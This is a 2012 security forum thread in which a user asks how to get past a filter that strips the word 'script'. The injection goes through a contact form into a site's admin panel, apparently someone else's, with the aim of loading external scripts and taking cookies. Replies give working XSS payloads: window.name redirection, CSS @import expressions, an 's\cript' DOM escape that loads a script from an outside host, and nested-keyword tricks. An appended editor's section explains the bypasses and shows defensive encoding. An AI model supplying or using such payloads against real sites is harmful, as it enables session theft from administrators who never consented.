Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 
Bypass Weird XSS Filter; Help?
Posted by: Anonymous User
Date: March 22, 2012 12:41AM

So this one site has an XSS filter where the word "script" is stripped from any input.

I am able to inject <img src=1 onerror=> stuff, but what I want to do is be able to do the equivalent of <script src=xssshell.asp></script>.

Basically I want to be able to load external scripts. Is that possible to do with onerror? Also it can't be too long.

Also, I can inject an iframe, but that's almost useless for getting cookies because of same origin policy.



Edited 2 time(s). Last edit at 03/22/2012 01:50AM by cookiesui.

Re: Bypass Weird XSS Filter; Help?
Posted by: Gareth Heyes
Date: March 22, 2012 05:08AM

<img src=1 onerror=location=top.name>

<style>@import//evil;

<iframe onload=location=top.name>

Or use the dom:
<img src=1 onerror=with(s=createElement('s\cript'))src='//businessinfo.co.uk/labs/xss/xss.js',document.body.appendChild(s)>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 03/22/2012 05:08AM by Gareth Heyes.

Re: Bypass Weird XSS Filter; Help?
Posted by: Anonymous User
Date: March 22, 2012 08:29AM

Wait, so what part of this is directly from your injection?

<img src=1 onerror=>

Also, what are you injecting into? (Attribute, page body, etc..)

And an iframe is not useless if the data you are loading in the frame is designed to reach into the user's cookies and pull out the data (unless the HttpOnly flag is set on the cookie).

Re: Bypass Weird XSS Filter; Help?
Posted by: Anonymous User
Date: March 22, 2012 02:33PM

Gareth Heyes Wrote:
-------------------------------------------------------
> <img src=1 onerror=location=top.name>
>
> <style>@import//evil;
>
> <iframe onload=location=top.name>
>
> Or use the dom:
> <img src=1 onerror=with(s=createElement('s\cript'))src='//businessinfo.co.uk/labs/xss/xss.js',document.body.appendChild(s)>

Can you explain how the first 3 work and how I would use them? And thanks; I'll give the last one a try :P


./D Wrote:
-------------------------------------------------------
> Wait, so what part of this is directly from your
> injection?
>
> <img src=1 onerror=>
>
> Also, what are you injecting into? (Attribute,
> page body, etc..)
>
> And an Iframe is not useless if the data you are
> loading in the frame is designed to reach into the
> users cookies and pull out the data. (unless
> HTTPOnly flag is set on the cookie)

Er, I can inject <img src=1 onerror=alert('hi')> using a contact form, and it ends up in the page body of an admin cp.

Could you go into detail (or point me towards a link) about how to get the cookie of the parent window, while inside an iframe from an external source? I'm a noob at this stuff.



Edited 1 time(s). Last edit at 03/22/2012 02:38PM by cookiesui.

Re: Bypass Weird XSS Filter; Help?
Posted by: Gareth Heyes
Date: March 23, 2012 06:17AM

top.name works by getting the payload from the window name. You can set the value to javascript:alert(1) or whatever from an iframe/new window or a simple redirection as long as it sets window.name='payload'.

@import would just import a CSS file that contains an expression and would work on <= IE7 or compat mode. Such as:
http://www.businessinfo.co.uk/labs/xss/xss.css


Re: Bypass Weird XSS Filter; Help?
Posted by: lightos
Date: March 24, 2012 06:07AM

Just curious, since you said the word script is stripped out, does scrscriptipt work? Those type of filters always make me giggle.

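Editor's added example, not code from anyone in the thread: a single-pass "strip the word script" filter of the kind the original poster describes, run against the two bypasses discussed above (Gareth's `'s\cript'` escape in the DOM payload, and lightos's nested `scrscriptipt`), next to what a hardened handler has to do instead. The script URL is a placeholder host (example.invalid), and `Function()` stands in for the browser's JS engine parsing the `onerror` attribute; nothing here is fetched.

```javascript
// Added example, not code from the thread: a single-pass "strip the word
// script" filter like the one the original poster describes, the two bypasses
// discussed (the s\cript escape and the nested scrscriptipt), and what a
// hardened version has to do instead.

// The filter as described: delete every "script", case-insensitively, once.
function naiveStripScript(input) {
  return input.replace(/script/gi, '');
}

// Same idea, repeated until nothing changes, so stripping cannot reassemble
// the word. Still only a blocklist; shown for contrast, not as the answer.
function stripScriptUntilStable(input) {
  let prev;
  let cur = input;
  do {
    prev = cur;
    cur = prev.replace(/script/gi, '');
  } while (cur !== prev);
  return cur;
}

// The fix for untrusted text that lands in an HTML body: encode the HTML
// metacharacters so no tag or attribute is created at all.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Gareth's DOM payload, with the script URL swapped for a placeholder host.
// String.raw keeps the backslash exactly as it would be typed into the form.
const domPayload = String.raw`<img src=1 onerror=with(s=createElement('s\cript'))src='//example.invalid/xss.js',document.body.appendChild(s)>`;

// lightos's nested word.
const nestedPayload = '<scrscriptipt>alert(1)</scrscriptipt>';

// What the JS engine makes of the first single-quoted string literal inside
// the handler: "\c" is a non-special escape and decodes to plain "c".
// Function() only stands in for the browser parsing the onerror attribute.
function literalAsSeenByJs(handlerHtml) {
  const m = /'[^']*'/.exec(handlerHtml);
  return m ? Function('return ' + m[0])() : null;
}

function demo() {
  const filteredDom = naiveStripScript(domPayload);
  return {
    // The filter never matched: "s\cript" is not the substring "script".
    domFilterChangedInput: filteredDom !== domPayload,
    // ...but the engine still ends up calling createElement('script').
    domTagName: literalAsSeenByJs(filteredDom),
    // One pass turns scrscriptipt into script.
    nestedAfterOnePass: naiveStripScript(nestedPayload),
    // Repeating until stable removes it, at the cost of mangling the text.
    nestedAfterStable: stripScriptUntilStable(nestedPayload),
    // Encoding leaves the text readable and inert.
    encoded: htmlEncode(nestedPayload),
  };
}

console.log(demo());
```

The point the thread makes, in running form: the filter inspects the HTML it receives, while the browser decodes the attribute value a second time as JavaScript, so any blocklist applied at the first layer can be defeated by an escape that is only resolved at the second. Stripping until stable closes the nesting trick but not the escape trick; encoding at the point of output closes both.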

